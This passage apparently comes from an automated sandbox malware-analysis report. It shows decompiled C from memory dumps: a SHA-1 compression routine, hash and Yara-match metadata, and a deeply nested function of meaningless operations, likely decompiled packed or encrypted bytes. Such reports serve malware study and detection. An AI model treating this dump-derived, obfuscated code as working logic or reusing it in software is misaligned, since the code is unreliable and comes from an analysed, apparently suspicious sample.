				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                      0x00409e4b
                                      0x00409e4f
                                      0x00409e51
                                      0x00409e51
                                      0x00409e54
                                      0x00409e76
                                      0x00409e9c
                                      0x00409ec2
                                      0x00409ee4
                                      0x00409eeb
                                      0x00409eee
                                      0x00409ef1
                                      0x00409efa
                                      0x00409f00
                                      0x00409f07
                                      0x00409f18
                                      0x00409f1b
                                      0x00409f1e
                                      0x00409f22
                                      0x00409f24
                                      0x00409f26
                                      0x00409f2f
                                      0x00409f32
                                      0x00409f35
                                      0x00409f40
                                      0x00409f46
                                      0x00409f48
                                      0x00409f48
                                      0x00409f4b
                                      0x00409f4e
                                      0x00409f4e
                                      0x00409f53
                                      0x00409f55
                                      0x00409f58
                                      0x00409f5b
                                      0x00409f61
                                      0x00409f64
                                      0x00409f67
                                      0x00409f70
                                      0x00409f76
                                      0x00409f7f
                                      0x00409f8e
                                      0x00409f95
                                      0x00409f98
                                      0x00409f9b
                                      0x00409fa4
                                      0x00409fa7
                                      0x00409faa
                                      0x00409fc2
                                      0x00409fc9
                                      0x00409fcb
                                      0x00409fce
                                      0x00409fd1
                                      0x00409fda
                                      0x00409fe1
                                      0x00409fe4
                                      0x00409fe7
                                      0x00409ff6
                                      0x00409ffd
                                      0x0040a000
                                      0x0040a003
                                      0x0040a00c
                                      0x0040a016
                                      0x0040a019
                                      0x0040a025
                                      0x0040a028
                                      0x0040a02f
                                      0x0040a032
                                      0x0040a035
                                      0x0040a03a
                                      0x0040a03d
                                      0x0040a046
                                      0x0040a057
                                      0x0040a05a
                                      0x0040a05d
                                      0x0040a064
                                      0x0040a067
                                      0x0040a06a
                                      0x0040a06d
                                      0x0040a06f
                                      0x0040a072
                                      0x0040a075
                                      0x0040a07e
                                      0x0040a083
                                      0x0040a083
                                      0x0040a098
                                      0x0040a09b
                                      0x0040a09e
                                      0x0040a0a5
                                      0x0040a0a8
                                      0x0040a0ab
                                      0x0040a0c0
                                      0x0040a0c7
                                      0x0040a0ca
                                      0x0040a0ce
                                      0x0040a0d1
                                      0x0040a0d6
                                      0x0040a0d9
                                      0x0040a0e8
                                      0x0040a0eb
                                      0x0040a0f2
                                      0x0040a0f5
                                      0x0040a0f8
                                      0x0040a0fb
                                      0x0040a0fe
                                      0x0040a106
                                      0x0040a114
                                      0x0040a117
                                      0x0040a11a
                                      0x0040a11a
                                      0x0040a121
                                      0x0040a124
                                      0x0040a127
                                      0x0040a12f
                                      0x0040a13d
                                      0x0040a140
                                      0x0040a147
                                      0x0040a14a
                                      0x0040a14d
                                      0x0040a150
                                      0x0040a153
                                      0x0040a15c
                                      0x0040a163
                                      0x0040a163
                                      0x0040a169
                                      0x0040a182
                                      0x0040a185
                                      0x0040a18c
                                      0x0040a18f
                                      0x0040a192
                                      0x0040a1a4
                                      0x0040a1ae
                                      0x0040a1b1
                                      0x0040a1ba
                                      0x0040a1bd
                                      0x0040a1c4
                                      0x0040a1c7
                                      0x0040a1cd
                                      0x0040a1e0
                                      0x0040a1e7
                                      0x0040a1ea
                                      0x0040a1ed
                                      0x0040a1f0
                                      0x0040a1f9
                                      0x0040a1fc
                                      0x0040a20f
                                      0x0040a212
                                      0x0040a21c
                                      0x0040a21f
                                      0x0040a221
                                      0x0040a22a
                                      0x0040a22d
                                      0x0040a240
                                      0x0040a246
                                      0x0040a249
                                      0x0040a250
                                      0x0040a252
                                      0x0040a255
                                      0x0040a258
                                      0x0040a25b
                                      0x0040a25e
                                      0x0040a261
                                      0x0040a26a
                                      0x0040a26f
                                      0x0040a272
                                      0x0040a272
                                      0x0040a285
                                      0x0040a288
                                      0x0040a28b
                                      0x0040a292
                                      0x0040a295
                                      0x0040a298
                                      0x0040a29b
                                      0x0040a2ae
                                      0x0040a2b1
                                      0x0040a2bc
                                      0x0040a2bf
                                      0x0040a2cb
                                      0x0040a2ce
                                      0x0040a2d4
                                      0x0040a2d7
                                      0x0040a2da
                                      0x0040a2e1
                                      0x0040a2f1
                                      0x0040a2f4
                                      0x0040a2fa
                                      0x0040a2fd
                                      0x0040a304
                                      0x0040a306
                                      0x0040a309
                                      0x0040a30c
                                      0x0040a30f
                                      0x0040a312
                                      0x0040a319
                                      0x0040a328
                                      0x0040a32b
                                      0x0040a332
                                      0x0040a335
                                      0x0040a338
                                      0x0040a33b
                                      0x0040a33e
                                      0x0040a341
                                      0x0040a344
                                      0x0040a34d
                                      0x0040a35e
                                      0x0040a366
                                      0x0040a36c
                                      0x0040a36f
                                      0x0040a371
                                      0x0040a374
                                      0x0040a377
                                      0x0040a384

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: (
                                      • API String ID: 0-3887548279
                                      • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                      • Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
                                      • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                      • Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0068035A, Relevance: .7, Instructions: 701COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313075452.0000000000672000.00000002.00020000.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000003.00000002.313064796.0000000000670000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20c8dd4c9aea4ad968d8e73fa68a8b46cb36e0ce49c942d269cbb9153f291f6b
                                      • Instruction ID: 68b1d4638ed8f715f09370dc3b9bf9010974fbd79cc716a5dcab316dc9e32360
                                      • Opcode Fuzzy Hash: 20c8dd4c9aea4ad968d8e73fa68a8b46cb36e0ce49c942d269cbb9153f291f6b
                                      • Instruction Fuzzy Hash: 76320CCB8EE6C33EDB0346A0EEB2250AF53986731972D45A7E4A4A5583E31DD53DC312
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D4FF, Relevance: .5, Instructions: 490COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 51%
                                      			E0041D4FF() {
				signed int _t55;
				signed int _t57;
				signed int _t62;
				signed int _t64;
				void* _t71;
				signed char _t72;
				signed int _t85;
				signed int _t87;
				signed int _t93;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;

				asm("adc eax, 0x900d8113");
				_t57 = (_t55 | 0x4520bee9) + 0x21ab3885;
				_t72 = _t71 - 1;
				asm("cmpsw");
				if(_t72 != 0) {
					 *0xa490f674 = __eax;
					__eax = __eax | 0xf63c899e;
					__edx =  *0x70a06f31;
					__ebp = __ebp |  *0xd3dc9cc5;
					__ebp = __ebp -  *0x278d0b35;
					__bh = __bh +  *0xe2ce4f9;
					asm("rcr dword [0x85bdbd95], 0x60");
					__cl = __cl & 0x0000003c;
					__eflags =  *0x6f4a0c81 - __esi;
					__edx =  *0x70a06f31 - 1;
					__esi = __esi +  *0xe317d2d8;
					 *0x35b8fda8 =  *0x35b8fda8 << 0x9f;
					__eax = __eax - 1;
					__eflags = __eax;
					if(__eax < 0) {
						__esp =  *0xa4946d7d * 0x5c9b;
						asm("scasb");
						__eflags =  *0xfa72d489 & __esp;
						asm("sbb edi, [0x4367ca9c]");
						asm("rol byte [0xe0977c80], 0x2f");
						 *0xbf9515f6 =  *0xbf9515f6 & __dl;
						_pop( *0xb7f93e9b);
						__esp = 0xc08d3306;
						__ah = __ah ^ 0x00000038;
						__edi = __edi |  *0xb464f83;
						__esi =  *0xb6c54d6a * 0xda67;
						 *0xbefdd7d1 =  *0xbefdd7d1 | __eax;
						asm("sbb eax, [0xa2f38e01]");
						_pop(__ecx);
						__edi = 0xcecf4492;
						_t21 = __bl;
						__bl =  *0x53efad8a;
						 *0x53efad8a = _t21;
						__dl = __dl +  *0xb2509b20;
						asm("rol byte [0x9f1325d7], 0x63");
						__al = __al ^ 0x000000a2;
						_pop( *0x908638ec);
						 *0xcf31a1fc =  *0xcf31a1fc >> 0xbf;
						__bl =  *0x53efad8a |  *0xa30034e6;
						_pop(__ebx);
						__bh = __bh |  *0x9a98ece1;
						__ebx = __ebx + 1;
						_pop(__esp);
						asm("rcr dword [0x9c518e05], 0x3e");
						_pop(__ebp);
						_push( *0x53ae059c);
						 *0x59c65a3 = __esi;
						__edx = __edx |  *0x6abb73ba;
						asm("rcr dword [0xe82e059c], 0x47");
						__eflags = __edx & 0x059c5ef1;
						__al = __al + 0xe2;
						__ecx = __ecx ^ 0x9c5ceddb;
						 *0xb14a5e05 =  *0xb14a5e05 | __eax;
						__ebx = __ebx ^  *0xe1039c6c;
						asm("cmpsw");
						_pop(__eax);
						__cl = __cl - 4;
						asm("adc [0x40b6ada3], ebp");
						 *0xb1945704 = __bh;
						__eax = __eax + 1;
						asm("rcl byte [0xbb9e3504], 0x53");
						__eax = __eax + 1;
						 *0xb99f6204 =  *0xb99f6204 + __ah;
						__eax = __eax + 1;
						__eflags = __eax;
						__ecx = 0xb66bf505;
						if(__eax >= 0) {
							asm("rcl dword [0x21059c70], 0xae");
							asm("sbb al, 0x63");
							asm("lodsd");
							__edi =  *0xec059c6a * 0xac59;
							__esp = 0xbb079c68;
							__eflags =  *0x81723aef - __esi;
							_pop(__ecx);
							__ebp = __ebp -  *0xec9507ee;
							__eflags = __ebp;
							__esp = 0xffffffffbb079c69;
							if(__ebp < 0) {
								asm("sbb [0xee5b7c71], esp");
								__esi = __esi +  *0x7f757607;
								__eflags = __esi;
								if(__esi < 0) {
									__ebx = __ebx | 0xee556e73;
									__esp = 0xffffffffdb2add62;
									 *0xee4d93c8 & __esi =  *0xb114708 & __dl;
									asm("adc [0x2b0b0e14], ch");
									 *0x4d9d08ca =  *0x4d9d08ca >> 0x15;
									_push(0xffffffffdb2add62);
									__ecx =  *0x1dce8fc5;
									 *0x1dce8fc5 = 0xb66bf505;
									 *0xa97708ca = __ah;
									_t29 = __dh;
									__dh =  *0x1df1b4b2;
									 *0x1df1b4b2 = _t29;
									 *0xc508ca30 =  *0xc508ca30 << 0xb1;
									 *0x7bab2c35 =  *0x7bab2c35 | __edi;
									__esp = 0xffffffffdbeadde2;
									__esp = 0xffffffffdbeadde2 |  *0x9de19b36;
									 *0x70e3bf6e =  *0x70e3bf6e + __edx;
									_pop( *0x317d09d9);
									__ch = __ch ^  *0x4bb8b53a;
									asm("movsb");
									_pop(__eax);
									asm("adc ebp, [0xf73509d9]");
									 *0x77c30400 =  *0x77c30400 + __cl;
									 *0xad96bc9 =  *0xad96bc9 & __bl;
									asm("sbb esi, 0x3e3f2bcd");
									asm("sbb [0x222d1bef], esp");
									asm("sbb esi, [0x6c0bd96e]");
									 *0x62910d0c = __dl;
									__ebp = __ebp |  *0x7017399f;
									_pop(__edx);
									asm("rcr byte [0x73339b08], 0x50");
									asm("adc edi, 0x311ff527");
									__dl = __dl | 0x000000ca;
									__ebp = 0x7c012f11;
									__eflags =  *0xc5ab2a8d & __ebx;
									 *0xf0801d36 =  *0xf0801d36 + __ebx;
									 *0xfa398128 =  *0xfa398128 | __ch;
									__eax = __eax ^  *0x5b1494ba;
									__ebp = 0x7c012f11 -  *0x7dbc5f39;
									asm("rcr dword [0x2cf1f2ce], 0x2f");
									__edi = __edi - 1;
									__esi = __esi + 1;
									asm("adc ebp, [0x7ca6ac33]");
									asm("sbb edx, [0xb0346507]");
									__ecx =  *0x1dce8fc5 &  *0x9cd212fa;
									__esp = (0xffffffffdbeadde2 |  *0x9de19b36) - 0x1a83bdcf;
									 *0xef289981 =  *0xef289981 << 0xbe;
									asm("scasd");
									__ch = __ch |  *0xc80b51c9;
									 *0xbf9d96d = 0xbb079c68;
									__eflags = __esi & 0x5eae73ff;
									__edi = __edi ^ 0x124ce5ed;
									__edi = __edi &  *0x65a5d97;
									 *0x80b77338 =  *0x80b77338 + __cl;
									 *0x9a0c1af0 =  *0x9a0c1af0 << 0x98;
									__eflags =  *0x9a0c1af0;
									__eax =  *0x3e7e6ede;
									if( *0x9a0c1af0 <= 0) {
										__eflags =  *0xbcb61d77 & __eax;
										__ebx = __ebx - 0x753f63e;
										 *0x84430f3c =  *0x84430f3c << 0xc5;
										 *0x16ee1636 =  *0x16ee1636 << 0xd4;
										__edi = __edi ^  *0xe511809b;
										__eflags = __edi;
										asm("lodsb");
										_push(__edx);
										if(__edi == 0) {
											__edx = __edx ^ 0x3efd0375;
											_push(__ebx);
											__eflags = __eax - 0x4824521;
											__ebx = __ebx |  *0xbe9a05bd;
											 *0x11389799 =  *0x11389799 << 0x51;
											__eflags =  *0x11389799;
											if( *0x11389799 == 0) {
												_pop( *0x880a0f7b);
												asm("sbb [0x31af48d], esi");
												 *0x274089f =  *0x274089f << 0x90;
												 *0xffbb1001 =  *0xffbb1001 & __esi;
												 *0x302b1c94 =  *0x302b1c94 << 0x3c;
												__esp =  *0xf899ff01;
												__eflags =  *0xd8ce5911 & 0x7c012f11;
												asm("sbb [0x79417fd2], cl");
												_pop(__ebx);
												__edi = __edi ^ 0x94df0233;
												_pop( *0x77097ed5);
												__eflags = __ecx -  *0xdb19ef1;
												_push( *0x46db1067);
												__ebp = __ebp |  *0xe0dd4b95;
												__eflags = 0x7c012f11;
												_push( *0xf899ff01);
												if(0x7c012f11 > 0) {
													__esp = __esp + 0xf285cb76;
													__eflags =  *0x9e2f9f21 - 0x7c012f11;
													__esi = __esi -  *0xce0922f7;
													_push(__ecx);
													_t38 = __esp;
													__esp =  *0x1fc40137;
													 *0x1fc40137 = _t38;
													__ebx = __ebx + 1;
													__bh = __bh ^ 0x00000088;
													__esp =  *0x1fc40137 + 1;
													__ch = __ch ^ 0x000000a0;
													__ebp = __ebp - 0x30d81715;
													__dl = __dl +  *0x5dce3ae4;
													__dl =  *0xb496ea3a;
													asm("stosb");
													asm("adc ebx, 0x767fc7cf");
													__edi = __edi |  *0xac989223;
													 *0x2734211c =  *0x2734211c + __al;
													__eflags =  *0x801ad1c - __bl;
													if( *0x801ad1c >= __bl) {
														__esp = __esp ^  *0xed369978;
														__eflags =  *0x8b462436 & 0x7c012f11;
														 *0x97a999fb =  *0x97a999fb << 0x22;
														asm("ror dword [0xf0f06f39], 0x6");
														 *0x3a191103 =  *0x3a191103 >> 0x6a;
														 *0xf5ac9df3 =  *0xf5ac9df3 >> 9;
														 *0x11b395d2 =  *0x11b395d2 ^ __cl;
														 *0x7bb4c2ea =  *0x7bb4c2ea >> 0xf8;
														__ch = __ch ^  *0x2a6b1588;
														 *0xb171f7c1 =  *0xb171f7c1 | __edi;
														__eflags = __eax -  *0x9ce0ccd8;
														__al = __al ^ 0x000000e0;
														_t41 = __eax;
														__eax =  *0x750ed88f;
														 *0x750ed88f = _t41;
														asm("sbb edx, 0x40714bf7");
														asm("sbb esi, [0x49ba981e]");
														 *0x4b30a40e =  *0x4b30a40e & 0x7c012f11;
														__eflags =  *0xa5d2116c & __esp;
														 *0x17e619b2 =  *0x17e619b2 & __bl;
														__bl = 0x28;
														asm("sbb bh, [0xc68d2710]");
														 *0xea9609b9 =  *0xea9609b9 ^ 0x7c012f11;
														asm("rcl byte [0x63199400], 0xa1");
														 *0x4169e718 =  *0x4169e718 & __bh;
														__eflags =  *0x4169e718;
														if( *0x4169e718 < 0) {
															__ebx = __ebx & 0x48b89871;
															__eflags = __ecx -  *0x600dedcf;
															_push( *0xc786aacb);
															__esp = __esp &  *0xbb01bb97;
															__ecx = __ecx | 0x291b2e91;
															 *0xcd0364ef =  *0xcd0364ef ^ 0x7c012f11;
															asm("movsw");
															asm("rol dword [0xe4dc3c35], 0xe1");
															 *0xa424da8e =  *0xa424da8e & __edx;
															asm("sbb dh, [0x19bf328a]");
															__ebx = __ebx |  *0x878fc30b;
															 *0x4f4dac01 =  *0x4f4dac01 << 0x2f;
															__eflags =  *0x4f4dac01;
															if( *0x4f4dac01 >= 0) {
																__edi =  *0x7935c27c * 0x828e;
																asm("lodsd");
																__edi = 1 +  *0x7935c27c * 0x828e;
																__eflags = __edi;
																if(__eflags < 0) {
																	asm("adc ecx, [0x11d13171]");
																	_pop(__esp);
																	if(__eflags >= 0) {
																		__ebx =  *0x838937c * 0x9db6;
																		asm("adc eax, 0x8f9ecdf");
																		__esi = __esi | 0xb40eca2e;
																		__eflags = __esi;
																		if(__esi <= 0) {
																			__ecx =  *0xb4f4b37f * 0x6f5d;
																			asm("lodsb");
																			 *0x1a752b3c =  *0x1a752b3c + __dl;
																			 *0x58116cec = __ebp;
																			asm("rcl dword [0xe91a5d05], 0x35");
																			 *0xc327170c = __bh;
																			__dl & 0x00000086 =  *0x7fcbb210 & __ch;
																			_t48 = __dh;
																			__dh =  *0xc94c232;
																			 *0xc94c232 = _t48;
																			__ebp =  *0x1be1a4ed;
																			asm("scasd");
																			 *0xf61e5533 =  *0xf61e5533 - __eax;
																			asm("movsb");
																			__eflags = __esp & 0x401553dd;
																			asm("adc [0x8fc812c7], esi");
																			__eflags =  *0x446addcf & __ebp;
																			__ebx = __ebx ^  *0x714a13cc;
																			__dh = 0x24;
																			 *0x8aa4a402 =  *0x8aa4a402 << 0x3f;
																			__eflags = __bh - 0x18;
																			__ebp = __ebp | 0x4b0c2df1;
																			asm("ror byte [0xe92ab2b2], 0xa8");
																			__eflags =  *0xf61e2c0f - __ebx;
																			asm("movsb");
																			 *0x181453dd =  *0x181453dd & __esp;
																			__esi = __esi - 1;
																			__edi = __edi + 0xbfc8c48d;
																			_t53 = __ebx;
																			__ebx =  *0x5685e5d4;
																			 *0x5685e5d4 = _t53;
																			asm("rol dword [0x4f628fec], 0xa6");
																			asm("adc [0xc4b3531], ebx");
																			__eflags =  *0x20dfaa8 & __cl;
																			asm("sbb [0x1e0e0c0c], dh");
																			__esp =  *0x8d88ffef;
																			_push(__esi);
																			__ecx =  *0xb4f4b37f * 0x6f5d +  *0xd793081;
																			__edi =  *0xe3e8dfeb;
																			asm("stosb");
																			asm("sbb eax, [0x8df8db8d]");
																			_push(__esi);
																			__esp =  *0x8d88ffef +  *0xf793081;
																			 *0xfb3bfb81 =  *0xfb3bfb81 ^  *0xb4f4b37f * 0x00006f5d +  *0xd793081;
																			 *0x5685e5d4 &  *0xfaf5edce =  *0x5685e5d4 &  *0xfaf5edce ^  *0xe826b031;
																			__eflags =  *0x5685e5d4 &  *0xfaf5edce ^  *0xe826b031;
																			if(( *0x5685e5d4 &  *0xfaf5edce ^  *0xe826b031) >= 0) {
																				asm("ror dword [0x129f3f70], 0xd9");
																				 *0x23a99c2a = __al;
																				asm("adc ah, 0x1a");
																				asm("lodsb");
																				 *0xaf765ac9 =  *0xaf765ac9 & __dl;
																				 *0x2823bca9 =  *0x2823bca9 & __ebp;
																				 *0xf9eba2e4 =  *0xf9eba2e4 << 0x39;
																				asm("rcl byte [0x92898c14], 0x1e");
																				__ecx = 0x230c598f;
																				 *0x50c6f898 =  *0x50c6f898 - __edi;
																				__eax = __eax + 1;
																				__ebp = __ebp + 1;
																				__ah = __ah +  *0xc4b3530;
																				asm("adc [0xa90ffaa8], dh");
																				_pop( *0x6f6cf0fb);
																				__edx = __edx |  *0xe32e5503;
																				__bl = 0xfffffffffffffff6;
																				 *0x5cae261c =  *0x5cae261c & __ah;
																				__ebx = 0xa7d1199f;
																				asm("lodsd");
																				asm("rcl dword [0xf8b33027], 0xf9");
																				asm("adc [0x12d86899], eax");
																				asm("adc [0xc60556ff], esi");
																				__ecx =  *0x19a2e66b * 0x4e4f;
																				__esi = __esi + 1;
																				__eflags = __esi;
																				if(__esi >= 0) {
																					__edi = 0xe1b0578;
																					asm("ror dword [0xbebdb4a3], 0x53");
																					__esp = __esp |  *0x58dfacc1;
																					asm("adc eax, [0x1c5e3f66]");
																					__ebx = 0xffffffffd0c07544;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				 *0x2be5a709 = _t104;
